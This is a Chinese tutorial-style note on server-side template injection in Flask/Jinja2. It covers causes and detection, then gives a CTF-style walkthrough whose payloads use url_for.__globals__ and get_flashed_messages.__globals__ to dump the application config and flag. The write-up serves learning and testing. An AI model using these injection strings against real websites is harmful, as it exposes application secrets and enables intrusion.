当前位置: 首页 > news >正文

SSTI

SSTI-原理&分类&检测&分析&利用
参考SSTI模板注入(Python+Jinja2)总结

1、什么是ssTI?有什么漏洞危害?
漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShel1等问题。其影响范围主要取决于模版引擎的复杂性。

2、如何判断检测ssTI漏洞的存在?
-输入的数据会被浏览器利用当前脚本语言调用解析执行

image
image

3、ssTI安全问题在生产环境那里产生?
-存在模版引用的地方,如404错误页面展示
-存在数据接收引用的地方,如模版解析获取参数数据

案例:
先访问判断存在注入
访问/shrine/{{2-2}},返回0,存在ssti注入
(看import的,有个flask,这个有ssti注入;看有没有模板解析函数,return那行正好有个template)
*有过滤括号
所以可以使用python flask支持的不用括号的全局变量函数:
url_for.__globals__
输入就是/shrine/{{url_for.__globals__}}
用这个可以找到flag/shrine/{{url_for.__globals__['current_app'].config}}
get_flashed_message()获取传递过来的数据,也可以用
/shrine/{{get_flashed_messages.__globals__}}
/shrine/{{get_flashed_messages.__globals__ ['current_ app'].config}}

image

http://www.zskr.cn/news/1523826.html

相关文章:

  • 网盘直链下载助手:跨平台下载解决方案的技术实现与应用实践
  • MPC8313E DDR内存控制器配置实战:从原理到调试
  • SPT-AKI存档编辑器:3步掌握《逃离塔科夫》单机版的完全控制权
  • 中小企业获客成本高?问题可能出在内容缺乏战略 - GrowthUME
  • Forza Mods AIO:如何零成本获得《极限竞速》的完整掌控权?
  • 以太网MAC-PHY接口技术详解:从GMII、RGMII到TBI/RTBI的设计与实战
  • 纸制品外贸网站如何提高海外客户转化率? - 外贸营销驿站
  • MPC8540 L2缓存与性能监控实战:嵌入式系统性能调优利器
  • 终极流程图自动化神器:3步掌握flowchart.js专业绘制技巧
  • 嵌入式硬件设计:可编程逻辑方程在MPC8272ADS开发板中的核心应用
  • 如何突破网盘限速:9大主流网盘高速下载的终极免费方案
  • 从Airflow DAG到数据地图:我用OpenMetadata+DataHub Connector打通元数据管道的踩坑实录
  • 向量数据库实战:从语义搜索到AI推理的基础设施跃迁
  • MPC8272并行I/O端口配置详解:从寄存器操作到通信接口实战
  • 深入解析PowerQUICC II 60x总线:未对齐访问、端口大小与数据流模式实战
  • GoWxDump:揭秘微信数据背后的故事,5分钟掌握跨平台取证技巧
  • PyTorch炼丹效率翻倍?聊聊torch.backends.cudnn.benchmark这个开关到底怎么用
  • 3步轻松下载B站无水印视频:BiliDownload完整使用指南
  • 3分钟让模糊照片重生:这款免费AI图像修复工具如何拯救你的珍贵记忆
  • 2026年最新推荐 济南保安公司加盟总部、保安公司挂靠中心排行:合规资质与扶持实力对比 - 奔跑123
  • MPC8272 SCC控制器深度解析:从寄存器配置到实战调试
  • Honey Select 2 游戏增强补丁:自动化翻译与去码优化架构解析
  • 一文揭秘消防验收核心指标,避开百万整改损失
  • 照片像素要求288*342怎么调?证件照像素大小修改工具及教程 - 像素测评
  • 3步搞定语言障碍和功能限制:HS2-HF_Patch终极增强指南
  • 嵌入式安全引擎DEU寄存器详解:从DES/3DES加速到错误处理实战
  • MPC8313E处理器架构解析:内存映射、外设集成与嵌入式网络应用
  • 2026云南靠谱正规导游推荐TOP3口碑参考,本地人私藏,纯玩无购物,费用和避坑参考 - 旅游发布
  • 掌握AMD Ryzen处理器深度调试:SMUDebugTool实用指南
  • Python之antspyt1w包语法、参数和实际应用案例